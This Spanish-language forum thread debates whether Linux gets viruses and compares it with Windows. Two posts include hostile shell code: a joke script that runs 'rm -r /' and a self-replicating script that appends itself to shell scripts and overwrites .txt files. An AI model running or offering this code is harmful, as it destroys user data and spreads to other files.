Virus En linux

¿usted en linux algunas ves le ha penetrado una cosa de estas en este sistema operati

  • si, se me han metido virus estando en linux

    Votos: 2 3.2%
  • no, para nada

    Votos: 50 79.4%
  • ¿que es eso?

    Votos: 11 17.5%

  • Votantes totales
    63
En Linux.. existe el código malicioso (como en cualkier S.O) pero de ahí a que ese código se ejecute automágicamente (Como en Windows....) sinceramente falta una eternidad y media :p (A no ser que siempre inicies sesión como root :/)

Ahí es donde radica la diferencia entre Linux y Windows....

offtopic... este tema me recuerda una frase que leí de krawek hace un tiempo...

este sería un virus...
#!/bin/sh
rm -r /

Simplemente dele permisos de ejecución y ahí tiene :p
Listo, inventé el primer virus para Linux
 
jejeje, acabo de escribir otro

ADVERTENCIA: NO LO EJECUTE SOBRE SU CUENTA

Código:
dcuadra@s4pc14 virus $ cat virus.sh
#!/bin/sh

LANG=en_US
ME="$0"
TO_INFECT=`find . -type f -exec file {} \; | grep -i shell | cut -f1 -d:`

function clone()
{
        echo "Cloning to $1"
        if [ "`grep -c TO_INFECT $1`" == "0"  ]
        then
                cat $ME >> $1
        fi
}


for script in $TO_INFECT
do
        clone $script
done


# Aqui se puede añadir codigo que quiere que se ejecute

# eg. haxorizador
for x in `find . -name "*.txt"`
do
        cat "${x}" |tr "a" "4"|tr "e" "3"|tr "i" "1"|tr "o" "0"|tr "s" "5"|tr "t" "7"|tr "l" "|" > ${x}
done
 
krawek dijo:
ese Oesoto si es chistoso, le falto decir que tiene todo el software legal, o que no le toca formatear periodicamente jajaja

http://www.laneros.com/showthread.php?t=15327


yo he corrido virus en Linux con wine

Juasss !!! esa si estuvo olimpica ! ja ja ... es que, no es que uno le tenga la mala gana a Windows porque sí, es que no hay quien se salve de esa pestilencia tan berraca que lo agobia ! ...

"No se me ha metido virus en Windows" a lo bien, que chiste tan bueno ! ... a lo bien, Les Luthiers quedo pequeño hombre !
 
Si usted quiere volver ****************** toda la información en su equipo, lo puede hacer, solo con entrar en modo raíz (o administrador) y shift suprimir sobre el directorio manejado por el sistema.

Pero un virus debe copiarse en el sistema, reproducirse sin causar daño al equipo, luego sí causar daño. Si un virus no se reprodujera, no sería virus =)
 
hombre... esatas hablando de un gusano (worm).... los virus actuan diferentes....
la cuestion es que de esos programas maliciosos hay tres clases:
virus
gusanos
troyanos...

ya lo que es spyware y malware es otra cosa..
 
Yo hablando de Virus y ustedes se me meten por el lado de los Spyware, y tanto que alegan por hacer una diferenciación entre Virus y Spyware :\

Mejor dicho deje así! Foros sin fanatismos de por medio are thx! Afortunadamente en esta sección quedan personas como Krieg con las que uno podría llevar una discusión de forma adecuada.
 
hombre... esatas hablando de un gusano (worm).... los virus actuan diferentes....
la cuestion es que de esos programas maliciosos hay tres clases:
virus
gusanos
troyanos...

ya lo que es spyware y malware es otra cosa..

si, pero al fin y al cabo son programas, codigo, software, aplicacion, llamelo como quiera...en Linux y BSD se tratan como tal, otra buena razon es la forma como se comparte el codigo fuente de la mayoria de programas libres entre la comunidad, por ahi lei un articulo donde linus hace "compatible" el kernel con un virus multiplataforma de ejemplo creado por kaspersky:

http://barrapunto.com/article.pl?sid=06/04/19/0746250&mode=thread

creo que aqui en laneros tambien se trato ese tema hace algun tiempo.

Pd. en linux si es facil hacer un virus, o sino vean los ejemplos de krawek:D o lean esto:
http://www.e-ghost.deusto.es/docs/articulo.virus.html
y las razones por las cuales no hay virus en linux ya se expusieron.:D
 
Yo tengo que unirme a Oesoto con su posición sobre Windows. Actualmente ya no lo uso sino para jugar Grand Prix Legends y Lineage II C4. Y eso de cuando en cuando una o dos veces a la semana. Pero antes que tuve Windows 95, 98 y XP, nunca tuve inconvenientes de virus. Usaba y uso aún el AVG únicamente, ni siquiera le tengo un anti-spyware instalado aunque a veces probé el AdAware. Ha sido así siempre por la conciencia que uno mismo se crea sobre tener cuidado y tal vez sumado a un poco de suerte. No abrir correos con attachments, navegar con Opera y eliminar cookies y limpiar cache cada que se cierra el browser son algunas de las "políticas" que tengo con el único equipo Windows. Detalles así reducen opciones.

Sin embargo, lo que sí es cierto es que hace poco, cuando llegó el portatil Dell con Windows Media Centre 2005 instalado y McAfee noSeQueVersión luego de un mes empezaron a aparecer dialers y un montón de pop-ups... la solución? Formateo + SuSE 10.1 y listo. No más inconvenientes. De ahí en adelante nunca he tenido un virus o comportamientos extraños en el portatil.
 
Por eso siempre he defendido la idea de "Use lo que quiera y aprenda a usarlo bien" pero nadie me cree :'(

entonces usa tu porqueria de windows pu!!!!!
y ocnsiguete un pololo Gay y aprende a usarlo :enojado:
 
Bueno, dudo mucho que a un equipo con Windows no le entren virus, yo uso win XP (muy poco, sólo por mi trabajo), en casa tengo Kubuntu 6.06 y Win XP (éste último para mi hermano, que usa Autocad y otras cosas propias de WIn) y en más de una ocasión le ha entrado virus (al Windows me refiero, por supuesto), recuerdo que una vez le entró un troyano maldito, que hasta me tocó corregir el registro, y los infaltables spywares y por ahí un adware, pero con Linux me paseo de lo lindo, uso Limewire para bajar música y videos y tengo cero problemas. Yo reviso equipos con WinXP y que trabajan mal, y encuentro virus por cientos (ojo, no exagero); una vez hice una prueba, hice una instalación limpia de WinXP, usé Ares para bajar música y no instalé antivirus, el resultado: en cuestión de horas el equipo ya presentaba fallas....
 
virus no... gusano si.. una vez un muy querido amigo, desarrollador de una distribucion de linux de aca del pais, de hace ya varios años, le dio por desquitarse con una sala que tenia linux y creo un lindo gusanito, en assembler, cuantas veces reinstalaron esas maquinas siempre seguian con el bicho, como carajos lo hizo? no se... es de esos enigmas que :S...
a mi pc el 1er virus le cayo en DOS 6.0 :( no recuerdo que juego instale, cuando el maldito natas... estoy hablando de hace como 12 años.
 
virus no... gusano si.. una vez un muy querido amigo, desarrollador de una distribucion de linux de aca del pais, de hace ya varios años, le dio por desquitarse con una sala que tenia linux y creo un lindo gusanito, en assembler, cuantas veces reinstalaron esas maquinas siempre seguian con el bicho, como carajos lo hizo? no se... es de esos enigmas que ...
a mi pc el 1er virus le cayo en DOS 6.0 no recuerdo que juego instale, cuando el maldito natas... estoy hablando de hace como 12 años.

tal vez el gusano se copiaba al MBR del disco duro o en los primeros sectores del disco pues es la unica forma fisica de que un programa prevalezca en un PC despues de formatearse, otra es el Flash ROM pero bueno eso ya es otro cuento, si fue asi como desarrollo el virus su amigo pues mis respetos, en fin, de pronto al formatear pues seguia ahi, si hubieran hecho un formato a bajo nivel cualquier virus, gusano o lo que sea, asi hubiese sido hecho en assembler, se hubiera borrado. un gusano es como cualquier otro programa y como tal debe tratarse, no por el hecho de hacerse en assembler se va a convertir en un programa inteligente. hay poca gente creadora de virus que programa en assembler.
 
Linux no es 100% inmune a los virus, pero su rango de existencia de virus es muchísimo menor a la de windows, no porque sea menos popular (así linux sea más popular que windows, ésto que digo se seguiría cumpliendo) sino porque debido a todos los derechos que da windows, cualquier novato que haya hecho dos cursos en un curso básico de programación, puede crear un virus, esto no ocurre en linux, ya hay que saber assembler, un lenguaje de muy bajo nivel que casi nadie sabe.
 
Afirmativo

Erase una vez... un portatil Toshiba VP inote 166 MHZ. de tiempos lejanos, desamparados y desconocidos en mi rigor informatico, cosa que sigue siendo igual, jeje, para explicar como fue...

Tenia instalado, el pobre, la segunda version de windows `98 y presumia a rebosar de programas y juegos, videos " minimizados " y fotos " comprimidas " al limite hasta el punto de conectarlo a internet ( PCMIA ) y chof... ni siquiera se despidio de mi con un simple firewall...asi pues me dirigí velozmente a por Linux 8.0 con Tool Box y ¡ tachan ! resucitó...

Hice un par de cositas con total libertad digital, pero un dia...quise ejecutar un comando de instalacion de paquetes y extraer de la version 9.0 del famoso pinguino...y origino un error ( x ) que pedia, a modo de RAM reiniciar... lo hice y ya no reconocio mas a mi fiel compañero Toshiba.

No mas, esta claro que hacer " sandwiches " de windows-linux, no compensa pues los virus de windows se los debió transmitir a linux. Ahora pues, creo que si le ocurre algo semejante al proximo que compre, del cual espero ser documentado aqui en Laneros, pienso quitar la tapita del disco duro, y pintar el tirador de rojo como si fuese mi solucion de emergencia...jeje...
 
Oesoto dijo:
Yo hablando de Virus y ustedes se me meten por el lado de los Spyware, y tanto que alegan por hacer una diferenciación entre Virus y Spyware :\

Mejor dicho deje así! Foros sin fanatismos de por medio are thx! Afortunadamente en esta sección quedan personas como Krieg con las que uno podría llevar una discusión de forma adecuada.
tranquilo hombre ,mas parece que un virus acabo con tu humildad
 
Oesoto dijo:
Yo hablando de Virus y ustedes se me meten por el lado de los Spyware, y tanto que alegan por hacer una diferenciación entre Virus y Spyware :\

Mejor dicho deje así! Foros sin fanatismos de por medio are thx! Afortunadamente en esta sección quedan personas como Krieg con las que uno podría llevar una discusión de forma adecuada.

Se comenzó hablando de virus, pero el foro pasó a tocar temas de seguridad en general y eso me parece bueno.

Otra cosa: no se están dando fanatismos, solo se está diciendo la verdad, la verdad me parece muy igualado comparar la seguridad de windows con linux (no hay virus ni en windows ni el linux --> ???????????), creo que usted es el primer y último que se atreve a afirmar que windows no tiene virus, menos mal no lo interpretaron de manera literal.
 

Los últimos temas